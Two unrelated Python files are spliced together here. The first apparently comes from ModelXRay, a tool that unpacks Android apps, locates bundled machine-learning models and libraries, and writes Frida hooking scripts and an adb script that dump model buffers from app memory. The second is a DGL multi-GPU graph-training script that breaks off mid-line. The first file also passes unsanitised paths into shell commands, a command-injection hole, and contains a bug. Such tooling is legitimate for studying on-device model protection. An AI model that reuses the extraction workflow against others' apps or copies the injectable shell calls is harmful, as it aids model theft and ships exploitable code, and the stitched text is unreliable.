def run_w(self, shell_cmd):
"""
run shell cmds with result returned
"""
logging.debug("executing shell cmd : " + shell_cmd)
try:
res = os.popen(shell_cmd).read().strip()
except:
logging.error("error in executing : " + shell_cmd)
res = ""
return res
def run_wo(self, shell_cmd):
"""
run shell cmds without result returned
"""
logging.debug("executing shell cmd : " + shell_cmd)
res = subprocess.call(shell_cmd, shell=True)
if res != 0:
logging.error("error in executing cmd :" + shell_cmd)
pass
def get_package_name(self):
if self._args.decomposed_package is True:
# TODO extract package name from AndroidManifest.xml
shell_cmd = 'cat %s/AndroidManifest.xml |grep -Po \'package=\"\K[^\"]*\'' % self._apkpath
else:
# extract from apk file
shell_cmd = 'aapt d xmltree %s AndroidManifest.xml|grep package=|sed \'s/.*package=\"\([0-9a-zA-Z\.]*\)\".*/\\1/\''% self._apkpath
res = self.run_w(shell_cmd).strip()
if len(res) == 0:
logging.info("can't get the correct package name")
res = os.path.basename(self._apkpath).strip()
if len(res) == 0:
logging.error("can't get apkpath")
return "unknown_apkpath"
return res
def decompose(self, pkgname):
decpath = os.path.abspath(self._decdir+pkgname)
apkpath = os.path.abspath(self._apkpath)
self._decpath = decpath
if os.path.exists(decpath):
logging.warning(decpath + " already exists!")
else:
shell_cmd = "apktool d %s -o %s" % (apkpath, decpath)
if self._args.fast_run is True:
shell_cmd += ' --no-res --no-src'
self.run_wo(shell_cmd)
pass
def remove_decomposed_files(self):
if self._args.decomposed_package is True:
# only remove respath, but keep decomposed_path if running from decomposed_package
respath = self._respath
if not os.path.exists(respath):
logging.warning(decpath + " not exists!")
else:
shell_cmd = "rm -r %s" % (respath)
self.run_wo(shell_cmd)
else:
decpath = self._decpath
respath = self._respath
if not os.path.exists(decpath) or not os.path.exists(respath):
logging.warning(decpath + " not exists!")
else:
shell_cmd = "rm -r %s" % (decpath)
self.run_wo(shell_cmd)
shell_cmd = "rm -r %s" % (respath)
self.run_wo(shell_cmd)
pass
def ls_dir(self, dir):
filenames = []
for subdir, dirs, files in os.walk(dir):
for file in files:
filepath = os.path.join(subdir, file)
filenames.append(filepath)
return filenames
def suffix_analyzer(self, filelist):
suffix = self._config.get("model_pattern","suffix").split(',')
suffix = [sf.strip() for sf in suffix]
res = []
for f in filelist:
for suf in suffix:
if f.endswith('.'+suf.strip()):
res.append(f)
return res
def keywords_analyzer(self, filelist, config_section):
keywords = self._config.get(config_section,"keywords").split(',')
keywords = [x.strip() for x in keywords]
logging.debug("keywords:" + (','.join(keywords)))
res = []
for f in filelist:
for kw in keywords:
if f.lower().find(kw.strip()) != -1:
res.append(f)
# filter out irrelevant files that have little chance of being model files
ex_suffix = self._config.get("model_pattern","ex_suffix").split(',')
ex_suffix = [x.strip() for x in ex_suffix]
logging.debug("ex_suffix:" + ','.join(ex_suffix))
ex_res = []
for f in res:
for es in ex_suffix:
if f.endswith('.'+es.strip()):
ex_res.append(f)
final_res = []
for x in res:
if x in ex_res:
continue
else:
final_res.append(x)
return final_res
def extract_model_path(self):
# get all the filename assets/
if self._args.decomposed_package is True:
decpath = self._apkpath
else:
decpath = os.path.abspath(self._decdir+self._pkgname)
assets_path = decpath + '/' + 'assets'
self._passets = assets_path
assets_files = self.ls_dir(assets_path)
relpath = [os.path.relpath(path, assets_path) for path in assets_files]
# merge potential model files using suffix and keywords analysis
res_suf = self.suffix_analyzer(relpath)
res_kw = self.keywords_analyzer(relpath, "model_pattern")
res = list(set().union(res_suf, res_kw))
# store model path
self._models = res
# report suspected model files
self._rh.write("\n### Suspected model files under assets/:\n")
self._rh.write("entropy\t\tsize\tfilename \t(entropy(0,8), [ent >7.5] means random):\n")
#self._rh.write('\n'.join(res) + '\n')
for f in res:
ff = assets_path + '/' + f.strip()
size_cmd = "ls -sh %s"%(ff)
ent_cmd = "ent -t %s"%(ff)
md5_cmd = "md5sum %s"%(ff)
res_size = self.run_w(size_cmd)
res_ent = self.run_w(ent_cmd)
res_md5 = self.run_w(md5_cmd)
try:
size = res_size.split()[0]
ent = res_ent.split('\n')[1].split(',')[2]
md5 = res_md5.split()[0][:8]
except:
size = ""
ent = ""
md5 = ""
self._rh.write(ent + '\t' + size + '\t' + f + '\t' + '\n')
# write entropy report for quick reference
self._entropy_report.append(ent + '\t' + md5 + '\t'+ size + '\t' + self._pkgname + '\t' + f + '\t')
# save model files
model_files = [os.path.basename(f) for f in res]
logging.info("model files:" + ','.join(model_files))
self._model_files = model_files
def append_entropy_report(self, guess_fw):
if len(self._entropy_report) != 0:
for e in self._entropy_report:
e += '\t'.join(guess_fw)
shell_cmd = "echo %s >> %s"%(e, self._entropy_report_path)
self.run_wo(shell_cmd)
def setup_lib_symbol(self, filelists):
symdir = self._outdir + '/' + self._pkgname + '/' + 'lib_symbol_files/'
self._symdir = symdir
symfilelist = []
try:
os.stat(symdir)
except:
os.mkdir(symdir)
for f in filelists:
basename = os.path.basename(f)
symfile = symdir + basename + ".symbols"
symfilelist.append(symfile)
if not os.path.exists(symfile):
shell_command = "nm -D --defined-only %s > %s" %(f, symfile)
self.run_wo(shell_command)
return symfilelist
def setup_lib_strings(self, filelists):
strdir = self._outdir + '/' + self._pkgname + '/' + 'lib_str_files/'
self._strdir = strdir
strfilelist = []
try:
os.stat(strdir)
except:
os.mkdir(strdir)
for f in filelists:
basename = os.path.basename(f)
strfile = strdir + basename + ".str"
strfilelist.append(strfile)
if not os.path.exists(strfile):
shell_command = "strings %s > %s" %(f, strfile)
self.run_wo(shell_command)
return strfilelist
def filter_meta_inf(self, line):
if "original/META-INF" in line:
return False
else:
return True
def search_dir(self, key, path):
res_str = []
shell_cmd = "ag %s -i --silent -m2 %s" %(key, path)
match = self.run_w(shell_cmd)
if match != "":
ml = match.split('\n')
ml = [m[len(path)-1:] for m in ml]
if len(ml) > 10:
ml=ml[:6]
res_str.append("\t--WARNING ! Too many matches, show 6 lines only!--")
res_str.append("\t--SHELL_CMD! %s"%shell_cmd)
# filter out original/META-INF/ entries
new_ml = filter(self.filter_meta_inf, ml)
res_str += new_ml
return res_str
def extract_filename_from_search_result(self, res):
flist = []
for line in res:
fname = line.split(':')[0].strip()
if fname.startswith('--WARNING') or fname.startswith('--SHELL_CMD'):
continue
if fname.endswith('.str'):
fname = fname[:-len('.str')]
if fname.endswith('.symbols'):
fname = fname[:-len('.symbols')]
if fname not in flist:
flist.append(fname)
return flist
def guess_ml_framework_by_magic_str(self, lib_files):
# report suspected libraries and frameworks
guess_fw = []
fw_libs = []
self._rh.write("\n\n### Suspected machine learning library files under lib/:\n")
# generate symbol files for libraries
symlist = self.setup_lib_symbol(lib_files)
self._symlist = symlist
# generate str files for libraries
strfilelist = self.setup_lib_strings(lib_files)
if (len(symlist) == 0 or len(strfilelist) == 0):
logging.warning("symlist or strfilelist is empty!")
return guess_fw
symf = symlist[0]
strf = strfilelist[0]
symfpath,symftail = os.path.split(symf)
strfpath,strftail = os.path.split(strf)
# get framework list from config
frameworklist = self._config.get("config","framework").split(',')
logging.debug("framework list:" + (','.join(frameworklist)))
# do keywords matching for each framework
for fw in frameworklist:
flag = False
libs = []
self._rh.write("\n\n\t* symbol matching for framework [%s]:\n" % fw)
# get keywords for each framework
magic_str_list = self._config.get(fw.strip(),"magic_str").split(',')
magic_str_list = [x.strip() for x in magic_str_list]
logging.debug("magic str list:" + (','.join(magic_str_list)))
for m in magic_str_list:
res1 = self.search_dir(m, symfpath)
res2 = self.search_dir(m, strfpath)
res = res1 + res2
if len(res) != 0:
self._rh.write("\n\t- magic word %s:\n\n"%m)
self._rh.write('\t' + '\n\t'.join(res))
# set flag
flag = True
libs += self.extract_filename_from_search_result(res)
if flag:
libs = list(set(libs))
fw += ':'+','.join(libs)
guess_fw.append(fw)
self._rh.write("\n\n### Guess Machine Learning Framework:\n")
self._rh.write('\n'.join(guess_fw))
self._rh.write('\n\n')
if len(guess_fw) == 0:
logging.info("Probably not a machine learning app, for no framework keywords matched!")
else:
logging.info("Might be a machine learning app, for framework keywords matched!")
self._is_ml_app = True
self._guess_fw = guess_fw
return guess_fw
def lib_str_match(self, lib_files): # TODO: Not Used For Now
# report suspected libraries based on whether model file names show up in library strings
self._rh.write("\n\n### Libraries under lib/ whose strings contain suspected model files:\n")
# generate str files for libraries
strfilelist = self.setup_lib_strings(lib_files)
if len(strfilelist) == 0:
logging.warning("strfilelist is empty! skipping lib str match analysis!")
return
for mf in self._model_files:
self._rh.write("\"%s\":\n" % mf)
sf = strfilelist[0]
head,tail = os.path.split(sf)
self.search_dir(mf, head)
pass
def general_str_match(self):
# report files that contain model file names by grepping over the decomposed dir
self._rh.write("\n\n### General scan over decomposed dir for model files\n")
for mf in self._model_files:
res = self.search_dir(mf, self._decpath)
if len(res) != 0:
self._rh.write("\n\n\t===\"%s\"===:\n" % mf)
self._rh.write('\n'.join(res))
pass
def lib_analysis(self):
"""
extract interesting library files
1. if the library file name contains ml lib keywords, report it
2. if the library file name does not contain ml lib keywords but its symbols do, report it
3. for each reported lib, run symbol/string analysis to guess the ML framework
"""
# get all the filename under lib/
if self._args.decomposed_package is False:
decpath = os.path.abspath(self._decdir+self._pkgname)
else:
decpath = self._decpath
lib_path = decpath + '/' + 'lib'
lib_files = self.ls_dir(lib_path)
# get relative path
relpath = [os.path.relpath(path, lib_path) for path in lib_files]
res_kw = self.keywords_analyzer(relpath, "lib_pattern")
# report suspected libraries
self._rh.write("\n\n### Suspected library files by name-matching under lib/:\n")
self._rh.write('\n'.join(res_kw) + '\n')
# do lib symbol analysis
guess_fw = self.guess_ml_framework_by_magic_str(lib_files)
# generate entropy report after get framework info
self.append_entropy_report(guess_fw)
pass
def check_magic_function(self, func_name):
"""
check whether function name matches any predefined magic_str in config:function_pattern
"""
# get function pattern
magic_str_list = self._magic_func_list
func_name_lower = func_name.lower()
for ms in magic_str_list:
if func_name_lower.find(ms.strip()) != -1:
return True
return False
def check_free_function(self, func_name):
free_str_list = self._free_func_list
free_filter_list = self._free_filter_list
fn = func_name.lower()
for fr in free_str_list:
if fn.find(fr.strip()) != -1: # found it
for ft in free_filter_list: # check filter list
if fn.find(ft.strip()) != -1:
return False # filter out
else:
continue
return True
else:
continue
return False
def generate_instrumentation_script(self, json_path, script_name):
# add frida cmd
app_name = self.get_package_name()
script_path = self._respath + '/' + script_name
js_script_path = script_path + '.js'
script_top = self._config.get("script", "top")
script_bottom = self._config.get("script", "bottom")
# shell script template
shell_tml_top = self._config.get("script", "shell_top")
shell_tml_mid = self._config.get("script", "shell_mid")
# generating javascript from template
shell_cmd = "cat %s > %s" % (script_top, js_script_path)
self.run_wo(shell_cmd)
shell_cmd = "cat %s >> %s" % (json_path, js_script_path)
self.run_wo(shell_cmd)
# insert appname
shell_cmd = "echo ';\nvar appname=\"%s\" ' >> %s" % (app_name, js_script_path)
self.run_wo(shell_cmd)
shell_cmd = "cat %s >> %s" % (script_bottom, js_script_path)
self.run_wo(shell_cmd)
# as a bonus, generate shell script
shell_script_path = script_path + '.sh'
# copy shell template top
shell_cmd = "cat %s > %s" % (shell_tml_top, shell_script_path)
self.run_wo(shell_cmd)
# add workingpath
shell_cmd = "echo 'WorkingPath=/sdcard/mallocbuffer/%s' >> %s" % (app_name, shell_script_path)
self.run_wo(shell_cmd)
# add shell template mid
shell_cmd = "cat %s >> %s" % (shell_tml_mid, shell_script_path)
self.run_wo(shell_cmd)
# add frida cmd
shell_cmd = "echo 'frida -U -f %s -l %s --no-pause' >> %s" % (app_name, script_name+'.js',shell_script_path)
self.run_wo(shell_cmd)
pass
def get_lib_free_functions(self, lib):
symdir = self._symdir
libsympath = symdir + lib + ".symbols"
free_functions = []
try:
logging.debug("libsympath:"+libsympath)
lines = open(libsympath, 'r').readlines()
for line in lines:
fields = line.split()
# add free function
if self.check_free_function(fields[2]) is True:
free_functions.append(fields[2])
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
except:
logging.error("error in generating lib free json files")
print "Unexpected error:", sys.exc_info()[0]
#raise
return free_functions
def generate_instrument_free_json(self):
"""
our goal is to find all ml libraries, and their dependency libs
for both the dependency libs and themselves, we instrument free
functions
depdic = {mllib1: [mllib1, a, b], mllib2: [mllib2, c, d]}
"""
# first, get dependency analysis for all libraries
all_libs = []
symlist = self._symlist
for symf in symlist:
symfpath,symftail = os.path.split(symf)
lib = symftail[:-8] # extract liba.so from liba.so.symbols
all_libs.append(lib)
logging.debug("all libs:")
logging.debug(all_libs)
all_libs_depdic = self.analyze_lib_dependency(all_libs)
# second, fetch all the machine learning libraries
ml_libs = self._libdepdic.keys()
## third, combine all_libs_depdic and ml_libs, get our free_depdic
#free_depdic = {}
#for lib in ml_libs:
# if lib in all_libs_depdic:
# free_depdic[lib] = all_libs_depdic[lib]
# if lib not in all_libs_depdic[lib]:
# free_depdic[lib].append(lib)
free_depdic = all_libs_depdic
# get dictionary for instrumenting free functions
libfreedic = {}
for lib in free_depdic:
deplibs = free_depdic[lib]
# extract raw libname, libocr.so --> ocr
rawlib = lib[3:-3]
if len(deplibs) == 1 and deplibs[0] == lib: # no external dependency
res = self.get_lib_free_functions(lib)
if res != None:
libfreedic[rawlib] = res
else:
logging.info(" can't generate json for lib:" + lib)
libfreedic.pop(rawlib, None)
elif len(deplibs) > 1:
# deplibs are more than one lib
freedic = {}
for deplib in deplibs:
rawdeplib = deplib[3:-3]
res = self.get_lib_free_functions(deplib)
if res != None:
freedic[rawdeplib] = res
else:
logging.info(" can't generate json for lib:" + deplib)
# skip this library, not every lib has free functions
if len(freedic) >= 1:
libfreedic[rawlib] = freedic
else:
logging.error("unexpeced lib dependencies, lib:"+lib)
logging.error(deplibs)
return libfreedic
def generate_lib_json(self, lib, fws):
symdir = self._symdir
libsympath = symdir + lib + ".symbols"
magic_json_list = []
match_all_list = []
match_fw_list = []
res = None
try:
logging.debug("libsympath:"+libsympath)
lines = open(libsympath, 'r').readlines()
for line in lines:
fields = line.split()
# selecting symbols for function definition
if (len(fields) >= 3) and fields[1] == 'T':
match_all_list.append(fields[2])
if self.check_magic_function(fields[2]) is True:
magic_json_list.append(fields[2])
# if function name contains framework name, add it
for fw in fws:
if fields[2].lower().find(fw) != -1:
match_fw_list.append(fields[2])
# matched, break current for loop
break
# truncate function list to avoid overflowing info
if len(magic_json_list) > self._max_func_num:
magic_json_list = magic_json_list[:self._max_func_num]
if len(match_all_list) > self._max_func_num:
match_all_list = match_all_list[:self._max_func_num]
if len(match_fw_list) > self._max_func_num:
match_fw_list = match_fw_list[:self._max_func_num]
res = (magic_json_list, match_all_list, match_fw_list)
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
except:
logging.error("error in generating lib json files")
print "Unexpected error:", sys.exc_info()[0]
#raise
return res
def generate_libdepdic_json(self, fws):
"""
given a list of library names and a list of framework names
generate corresponding instrumentation json file.
"""
# get lib_sym_dir
libmagicdic = {}
liballdic = {}
libfwdic = {}
for lib in self._libdepdic:
deplibs = self._libdepdic[lib]
# extract raw libname, libocr.so --> ocr
rawlib = lib[3:-3]
if len(deplibs) == 1 and deplibs[0] == lib: # no external dependency
res = self.generate_lib_json(lib, fws)
if res != None:
libmagicdic[rawlib] = res[0]
liballdic[rawlib] = res[1]
libfwdic[rawlib] = res[2]
else:
logging.info(" can't generate json for lib:" + lib)
# skip this library, not every lib has free functions
elif len(deplibs) == 1 and deplibs[0] != lib:
# deplib is not lib itself, which means lib is not an ml lib; we only need to instrument deplib
# once we detect that the system is loading lib
rawdeplib = deplibs[0][3:-3]
res = self.generate_lib_json(deplibs[0], fws)
if res != None:
libmagicdic[rawlib] = {rawdeplib:res[0]}
liballdic[rawlib] = {rawdeplib:res[1]}
libfwdic[rawlib] = {rawdeplib:res[2]}
else:
logging.info(" can't generate json for lib:" + deplibs[0])
# skip this library, not every lib has free functions
elif len(deplibs) > 1:
# deplibs are more than one lib
mdic = {}
adic = {}
fdic = {}
for deplib in deplibs:
rawdeplib = deplib[3:-3]
res = self.generate_lib_json(deplib, fws)
if res != None:
mdic[rawdeplib] = res[0]
adic[rawdeplib] = res[1]
fdic[rawdeplib] = res[2]
else:
logging.info(" can't generate json for lib:" + deplib)
libmagicdic[rawlib] = mdic
liballdic[rawlib] = adic
libfwdic[rawlib] = fdic
# for free instrumentation, it applies to all libraries
libfreedic = self.generate_instrument_free_json()
# write results to json file
logging.debug("json dumping ... libs: " + ','.join(self._libs) + " fw:" + ','.join(fws))
magic_json_path = self._respath + '/libdicmagic.json';
all_json_path = self._respath + '/libdicall.json';
fw_json_path = self._respath + '/libdicfw.json';
free_json_path = self._respath + '/libdicfree.json';
with open(magic_json_path, 'w') as outfile:
json.dump(libmagicdic, outfile)
with open(all_json_path, 'w') as outfile:
json.dump(liballdic, outfile)
with open(fw_json_path, 'w') as outfile:
json.dump(libfwdic, outfile)
with open(free_json_path, 'w') as outfile:
json.dump(libfreedic, outfile)
# generate the script with json file
self.generate_instrumentation_script(magic_json_path, "intercept_magic_func")
self.generate_instrumentation_script(all_json_path, "intercept_all_func")
self.generate_instrumentation_script(fw_json_path, "intercept_fw_func")
self.generate_instrumentation_script(free_json_path, "intercept_free_func")
pass
def analyze_lib_dependency(self, libs):
"""
analyze the libraries' dependency relationships:
if a is a dependency of b, then b will load a,
e.g. the result {'libb.so': ['libb.so', 'liba.so']} means libb.so loads liba.so.
We don't assume cascaded dependencies like a dep of b, b dep of c.
"""
libdepdic = {x:[x] for x in libs}
for lib in libs:
shell_cmd = "ag %s -l %s" % (lib, self._strdir)
res = self.run_w(shell_cmd).strip()
deps = res.split('\n')
if len(deps) > 0:
for dep in deps:
base = os.path.basename(dep)[:-4]
# generate dependency dictionary
if base != lib: # non-self dependency: base will load lib
if base in libdepdic:
libdepdic[base].append(lib)
else:
libdepdic[base] = [lib]
if lib in libdepdic:
libdepdic.pop(lib) # lib will be loaded by base
logging.debug("libdepdic:")
logging.debug(libdepdic)
return libdepdic
def generate_lib_dependency_report(self, libs):
self._rh.write("\n\n### Machine Learning Library Dependency/:\n")
# deduplicate libs
libs = list(set().union(libs))
self._libdepdic = self.analyze_lib_dependency(libs)
self._libs = libs
for lib in self._libdepdic:
deps = self._libdepdic[lib]
self._rh.write("\n[%s]:\n" % (lib))
self._rh.write("\t%s\n" % (lib)) # self dependency
for dep in deps:
self._rh.write("\t%s\n" % (dep))
self._rh.write("\n")
pass
def generate_script(self):
if self._is_ml_app is False or len(self._guess_fw) == 0:
return # don't generate script for no ml library found
# get framework shared library
libs = []
fws = []
for fw in self._guess_fw:
fields = fw.split(':')
fw_name = fields[0]
fw_libs = fields[1].split(',')
libs += fw_libs
fws.append(fw_name)
self.generate_lib_dependency_report(libs)
self.generate_libdepdic_json(fws)
pass
def setup_analyzer(self):
# add frida cmd
app_name = self.get_package_name()
analyzer_src_path = self._config.get("script","analyzer_path")
analyzer_list = self._config.get("script","analyzer_list").split(',')
analyzer_path = self._respath + "/model_analyzer/"
# create analyzer path
try:
os.stat(analyzer_path)
except:
os.mkdir(analyzer_path)
for a in analyzer_list:
# copy analyzer script
shell_cmd = "cp %s/%s %s" %(analyzer_src_path, a, analyzer_path)
self.run_wo(shell_cmd)
# create pull_and_analysis.sh script
pullbigbuffer_path = analyzer_path + 'pull_and_analysis.sh'
shell_cmd = "echo '#!/bin/sh' > %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'rm pb.result' >> %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'adb pull /sdcard/mallocbuffer/%s' >> %s" %(app_name, pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo './header.sh %s pb' >> %s" %(app_name, pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'ag conv pb.result' >> %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
shell_cmd = "echo 'ag TFL pb.result' >> %s" %(pullbigbuffer_path)
self.run_wo(shell_cmd)
pass
def copy_report(self):
if len(self._models) == 0 and self._is_ml_app is False:
return  # don't copy the report if no model was found and this is not an ML app
link = self._preports + '/' + self._pkgname + '.report'
target = os.path.abspath(self._report)
logging.info("target path:" + target)
shell_cmd = "ln -sf %s %s" %(target, link)
if os.path.exists(link) is True:
if self._skip is True:
return  # don't copy
self.run_wo(shell_cmd)
pass
def copy_models(self):
for m in self._models:
target = os.path.abspath(self._passets + '/' + m)
link = self._pmodels + '/' + self._pkgname +'_'+ os.path.basename(m)
shell_cmd = "ln -sf %s %s" %(target, link)
if os.path.exists(link) is True:
return  # don't copy
self.run_wo(shell_cmd)
pass
def test(self):
logging.debug(" Run Test!")
time.sleep(1)
def analyze(self):
if self._skip is True:
logging.warning("skipping analysis for report.md is there! see: %s" % self._report)
return
if self._args.decomposed_package is False:
self.decompose(self._pkgname)
self.extract_model_path()
self.lib_analysis()
# generate the JavaScript needed for dynamic instrumentation
if self._args.json_script is True:
self.generate_script()
self.setup_analyzer()
if self._args.fast_run is not True:
self.general_str_match()
self._rh.close()
# copy report to reports dir if not exists
self.copy_report()
# copy models to models dir if not exists
self.copy_models()
# If this is not a machine learning app and no models were found, optionally remove the decomposed files
if self._is_ml_app is False and len(self._models) == 0:
if self._args.space_efficient is True:
self.remove_decomposed_files()
pass
def worker(jobs, args, config, ns):
# each worker processes its own pre-split list of jobs
logging.debug("new worker created!")
length = len(jobs)
for i in xrange(length):
logging.info('modelxray is analyzing file ' + jobs[i])
model_profiler = ModelXRay(jobs[i], config, args)
if args.test_only is True:
model_profiler.test()
else:
model_profiler.analyze()
# update progress bar
ns.value = ns.value + 1
global bar
#bar.update(progress)
bar.update(ns.value)
# test whether it's a decomposed directory
def is_decomposed_dir(path):
dirs = os.listdir(path)
if "AndroidManifest.xml" in dirs:
return True
else:
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='modelxray')
parser.add_argument('apkpath',
help = 'path to apk file or directory')
parser.add_argument('-c', '--config-file', default = 'modelxray.config',
help = 'the path of %(prog)s config file')
parser.add_argument('-r', '--regenerate-report', action='store_true',
help = 'regenerate report even if report is there')
parser.add_argument('-l', '--log-file', action='store_true',
help = 'store log in modelxray.log(default to stdout)')
parser.add_argument('-v', '--verbose', action='store_true',
help = 'verbose logging info')
parser.add_argument('-f', '--fast-run', action='store_true',
help = 'run fast by only analyzing library and assets, not smali code')
parser.add_argument('-s', '--space-efficient', action='store_true',
help = 'save space by not storing non-machine learning decomposed apps')
parser.add_argument('-t', '--test-only', action='store_true',
help = 'donot do anything, just test work splitting for multiprocessing')
parser.add_argument('-j', '--json-script', action='store_true',
help = 'automatically generate json for dynamic instrumentation java script')
parser.add_argument('-p', '--package-name', action='store_true',
help = 'use package name as output directory name, default use apk path name')
parser.add_argument('-d', '--decomposed-package', action='store_true',
help = 'start analysis from already decomposed packages')
args = parser.parse_args()
if args.log_file is True:
if args.verbose is True:
logging.basicConfig(filename='modelxray.log', level=logging.DEBUG)
else:
logging.basicConfig(filename='modelxray.log', level=logging.INFO)
else:
if args.verbose is True:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
config = ConfigParser.RawConfigParser()
if (os.path.exists(args.config_file)):
config.read(args.config_file)
else:
logging.error("config file not exists")
exit(1)
jobs = []
if os.path.isfile(args.apkpath):
logging.info('modelxray is analyzing file ' + args.apkpath)
model_profiler = ModelXRay(args.apkpath, config, args)
model_profiler.analyze()
elif os.path.isdir(args.apkpath):
logging.info('modelxray is analyzing dir ' + args.apkpath)
if args.decomposed_package is True:
if is_decomposed_dir(args.apkpath):
# Single decomposed dir
model_profiler = ModelXRay(args.apkpath, config, args)
model_profiler.analyze()
else:
dirs = os.listdir(args.apkpath)
for d in dirs:
dp = args.apkpath + '/' + d
# skip irrelevant dirs
if is_decomposed_dir(dp):
jobs.append(dp)
else:
for subdir, dirs, files in os.walk(args.apkpath):
for file in files:
filepath = os.path.join(subdir, file)
if filepath.endswith('apk'):
jobs.append(filepath)
# get worker number
try:
ncpu = int(config.get("config","ncpu"))
logging.debug("ncpu: %d" % ncpu)
except:
ncpu = 4
with progressbar.ProgressBar(max_value=len(jobs)) as bar:
# create workers
workers = []
mgr = Manager()
ns = mgr.Namespace()
ns.value = 0
jobs_num = len(jobs)
worker_load = jobs_num / ncpu
worker_left = jobs_num % ncpu
if worker_load > 0:
for i in range(ncpu):
subjobs = jobs[i * worker_load : (i+1)*worker_load]
workers.append(Process(target = worker, args = (subjobs, args, config, ns)))
if worker_left > 0:
subjobs = jobs[ncpu*worker_load:jobs_num]
workers.append(Process(target = worker, args = (subjobs, args, config, ns)))
else:
workers.append(Process(target = worker, args = (jobs, args, config, ns)))
worker_num = len(workers)
for i in range(worker_num):
workers[i].start()
for i in range(worker_num):
workers[i].join()
pass
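# A minimal sketch of a modelxray.config file (the section and option names are
# the ones read by the code above; all values and file paths are illustrative
# assumptions):
#
#   [config]
#   output_dir = xray_output
#   decomposed_dir = decomposed/
#   max_func_num = 50
#   ncpu = 4
#   framework = tensorflow, caffe
#
#   [tensorflow]
#   magic_str = tensorflow, tflite
#
#   [caffe]
#   magic_str = caffe
#
#   [function_pattern]
#   magic_str = init, load, model, decrypt, start, create
#
#   [free_pattern]
#   magic_str = free
#   filter_str = free_exception, free_dependent_exception
#
#   [model_pattern]
#   suffix = pb, tflite, caffemodel, model
#   keywords = model
#   ex_suffix = png, jpg, json
#
#   [lib_pattern]
#   keywords = tensorflow, caffe, cnn
#
#   [script]
#   top = templates/script_top.js
#   bottom = templates/script_bottom.js
#   shell_top = templates/shell_top.sh
#   shell_mid = templates/shell_mid.sh
#   analyzer_path = analyzer/
#   analyzer_list = header.sh
#
# Example invocation (apktool, aapt, ag, nm, strings and ent are assumed to be
# installed and on the PATH):
#
#   python modelxray.py -c modelxray.config /path/to/apks/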
|
train_sampling_multi_gpu.py
|
import os
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import dgl.multiprocessing as mp
import dgl.nn.pytorch as dglnn
import time
import math
import argparse
from torch.nn.parallel import DistributedDataParallel
import tqdm
from model import SAGE
from load_graph import load_reddit, inductive_split, load_ogb
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
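# Worked example (illustrative): for pred = [[0.1, 0.9], [0.8, 0.2]] and
# labels = [1, 0], argmax over dim 1 gives [1, 0]; both predictions match,
# so the returned accuracy is 2 / 2 = 1.0.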
def evaluate(model, g, nfeat, labels, val_nid, device):
"""
Evaluate the model on the validation set specified by ``val_nid``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_nid : A node ID tensor indicating which nodes we actually compute the accuracy for.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
pred = model.inference(g, nfeat, device, args.batch_size, args.num_workers)
model.train()
return compute_acc(pred[val_nid], labels[val_nid])
def load_subtensor(nfeat, labels, seeds, input_nodes, dev_id):
"""
Extracts features and labels for a subset of nodes.
"""
batch_inputs = nfeat[input_nodes].to(dev_id)
batch_labels = labels[seeds].to(dev_id)
return batch_inputs, batch_labels
#### Entry point
def run(proc_id, n_gpus, args, devices, data):
# Start up distributed training, if enabled.
device = th.device(devices[proc_id])
if n_gpus > 0:
th.cuda.set_device(device)
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
# Unpack data
n_classes, train_g, val_g, test_g, train_nfeat, val_nfeat, test_nfeat, \
train_labels, val_labels, test_labels, train_nid, val_nid, test_nid = data
if args.data_device == 'gpu':
train_nfeat = train_nfeat.to(device)
train_labels = train_labels.to(device)
elif args.data_device == 'uva':
train_nfeat = dgl.contrib.UnifiedTensor(train_nfeat, device=device)
train_labels = dgl.contrib.UnifiedTensor(train_labels, device=device)
in_feats = train_nfeat.shape[1]
if args.graph_device == 'gpu':
train_nid = train_nid.to(device)
train_g = train_g.formats(['csc'])
train_g = train_g.to(device)
args.num_workers = 0
elif args.graph_device == 'uva':
train_nid = train_nid.to(device)
train_g.pin_memory_()
args.num_workers = 0
# Create PyTorch DataLoader for constructing blocks
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in args.fan_out.split(',')])
dataloader = dgl.dataloading.NodeDataLoader(
train_g,
train_nid,
sampler,
use_ddp=n_gpus > 1,
device=device,
batch_size=args.batch_size,
shuffle=True,
drop_last=False,
num_workers=args.num_workers)
# Define model and optimizer
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu, args.dropout)
model = model.to(device)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[device], output_device=device)
loss_fcn = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
tic = time.time()
# Loop over the dataloader to sample the computation dependency graph as a list of
# blocks.
for step, (input_nodes, seeds, blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# Load the input features as well as output labels
batch_inputs, batch_labels = load_subtensor(train_nfeat, train_labels,
seeds, input_nodes, device)
blocks = [block.int().to(device) for block in blocks]
# Compute loss and prediction
batch_pred = model(blocks, batch_inputs)
loss = loss_fcn(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU {:.1f} MB'.format(
